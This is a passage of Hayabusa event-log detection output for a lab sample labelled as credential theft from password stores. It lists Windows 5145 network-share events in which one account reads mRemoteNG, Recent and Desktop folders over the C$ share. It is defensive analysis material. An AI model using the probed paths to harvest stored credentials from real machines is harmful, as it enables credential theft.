| LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.343 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.343 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.343 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.359 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.359 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.359 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.390 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.390 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.390 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.468 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.484 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.505 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.507 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.523 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.558 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.561 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.561 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\baretail - Shortcut.lnk | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.592 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.608 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\night.bat | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.641 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: 